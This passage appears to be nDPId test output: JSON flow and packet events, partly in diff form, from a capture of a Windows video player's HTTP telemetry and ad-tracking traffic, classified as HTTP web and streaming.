{"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353140&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1021,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1467353141308,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353141308,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5uEFAADMGggXKbA7bwKhzCABQxS1wKzTY7Tl5ilAYADfR4AAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1467353142534,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353142534,"pkt":"TF4M6gNlABxCjnAxCABFAAOkBEBAAIAG5grAqHMIymwO7MUnAFCB65f\/kZem+1AYQRL+yQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNDIwNDQmc2g9JnNxPSZzdz0mdD0xcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353144633,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1467353144633,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":347,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":347,"pkt_l4_len":313,"thread_ts_msec":1467353144633,"pkt":"ABxCjnAxTF4M6gNlCABFAAFNZb1AADAG6WZ1T1GHwKhzCABQxQsUvd5l87WhOFAYAA4qLgAASFRUUC8xLjEgMzAyIEZvdW5kDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjMzIEdNVA0KQ29udGVudC1MZW5ndGg6IDANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClNldC1Db29raWU6IFY9NjY5Mzg1MTYxNTg4NTA0OTAxMTsgRG9tYWluPW1sdDAxLmNvbTsgRXhwaXJlcz1TYXQsIDAxLUp1bC0yMDE3IDA2OjA1OjM3IEdNVDsgUGF0aD0vDQpMb2NhdGlvbjogaHR0cDovL2NtYy50YW54LmNvbS9hbmRjP2FuZGNfdWlkPTY2OTM4NTE2MTU4ODUwNDkwMTEmYW5kY192ZXI9MQ0KDQo="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353144633,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353144633,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7580000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"thread_ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00971{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1467353144819,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":444,"pkt_l4_len":410,"thread_ts_msec":1467353144819,"pkt":"TF4M6gNlABxCjnAxCABFAAGuBX9AAIAGQAzAqHMIjM3zQMUyAFBCtQhgUXsfllAYQTeurQAAR0VUIC9hbmRjP2FuZGNfdWlkPTY2OTM4NTE2MTU4ODUwNDkwMTEmYW5kY192ZXI9MSBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNClJlZmVyZXI6IGh0dHA6Ly9pbWFnZTEud2Vic2NhY2hlLmNvbS92b2RndWlkZS9pbWFnZXMvdGFvYmFvYWQvdGFvYmFvL3Rhb2Jhby5odG1sDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KQ29va2llOiBjbmE9L2NBSER3UTFtMndDQVhhakNGbzBCbmxmOyBjbmF1aT0xOTgzMTU5NDkzDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiBjbWMudGFueC5jb20NCg0K"} -00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7580000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"thread_ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cmc.tanx.com","url":"cmc.tanx.com\/andc?andc_uid=6693851615885049011&andc_ver=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} +00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7580000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"thread_ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cmc.tanx.com","url":"cmc.tanx.com\/andc?andc_uid=6693851615885049011&andc_ver=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1467353144913,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1467353144913,"pkt":"ABxCjnAxTF4M6gNlCABFAAENPiNAACwGXAmMzfNAwKhzCABQxTJRex+WQrUJ5lAYFg2SoAAASFRUUC8xLjEgMjAwIE9LDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ0IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBjbG9zZQ0KU2VydmVyOiBUZW5naW5lDQpUaW1pbmctQWxsb3ctT3JpZ2luOiAqDQoNCjMxDQpHSUY4OWEBAAEAkQAAAAAA\/\/\/\/\/\/\/\/AAAAIfkEAQAAAgAsAAAAAAEAAQAAAgJUAQA7DQowDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7580000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00935{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1467353147705,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"thread_ts_msec":1467353147705,"pkt":"TF4M6gNlABxCjnAxCABFAAGTCAFAAIAG5GvAqHMIymwO28UzAFD2bwdscQOwMVAYAQQLYgAAR0VUIC9jb3JlP3Q9MTUwMzI5MSZ0eXBlPXZzJnV1aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mYXJlYT1PVkVSU0VBfFRXX0hpTmV0JmZyb209QlNfSGlnaCZ0bz1CU19TdGFuZGFyZCZwbGF5ZXJfc3dpdGNoX2JzX3RpbWU9NDE3MTQmYXZlcmFnZV9kb3dubG9hZF9zcGVlZF89MTU4NTE1LjIwMDAwMCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} -00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7580000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1503291&type=vs&uuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&area=OVERSEA|TW_HiNet&from=BS_High&to=BS_Standard&player_switch_bs_time=41714&average_download_speed_=158515.200000","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7580000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1503291&type=vs&uuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&area=OVERSEA|TW_HiNet&from=BS_High&to=BS_Standard&player_switch_bs_time=41714&average_download_speed_=158515.200000","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1467353147794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353147794,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FnZAADMGI9HKbA7bwKhzCABQxTNxA7Ax9m8I11AYADa2JwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7580000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"thread_ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01211{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1467353147927,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":622,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":622,"pkt_l4_len":588,"thread_ts_msec":1467353147927,"pkt":"TF4M6gNlABxCjnAxCABFAAJgCC5AAIAG43HAqHMIymwO28U0AFClUF0ecJA2DlAYAQSk3gAAR0VUIC9jb3JlP3Q9NSZhPTQmaXNmaW5pc2g9MiZ0bT03JnJhPTImdHJhPTEmcGY9MjAxJnA9MTEmcDE9MTE0JnAyPTMwMDAmc2RrdHA9MSZjMT02JnI9NTAwNDk0NjAwJmFpZD01MDI5NTk5MDAmdT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZwdT0mb3M9d2luZG93cyZ2PTUlMkUyJTJFMTUlMkUyMjQwJmtydj0yJTJFMCUyRTEwMiZkdD0maHU9LTEmcm49MTQ2NzM1MzE0NyZpc2xvY2FsPTAmYXM9ZDE5ZjY0MDQ3YjY0MWNkNmZmMDk2YjA0ZmIyYTMwYjUmdmU9M2NjMGM4ZmEzNzI2MjVlNjQxNDMxNDQ4MTZmM2U5NjgmcGU9Yzk1ZDk5MmUyOTg1NmRjODRmMmU5OTA3YTJlNGIyODImdmZybT0mY2hsPSZoY2Rudj0xMC4wLjAuMjkzJnRwY2Q9MCZpc2RybT0xJmh0PTAgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="} -01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7580000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"thread_ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=4&isfinish=2&tm=7&ra=2&tra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353147&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01148{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7580000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"thread_ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=4&isfinish=2&tm=7&ra=2&tra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353147&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1467353148016,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353148016,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5kRtAADMGqSvKbA7bwKhzCABQxTRwkDYOpVBfVlAYADcrXAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7580000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1467353150114,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353150114,"pkt":"TF4M6gNlABxCjnAxCABFAAOlCc1AAIAG4HzAqHMIymwO7MU1AFBQgbYWJ\/60ElAYQTeIsAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNDkwNDUmc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} -01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7580000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353149045&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 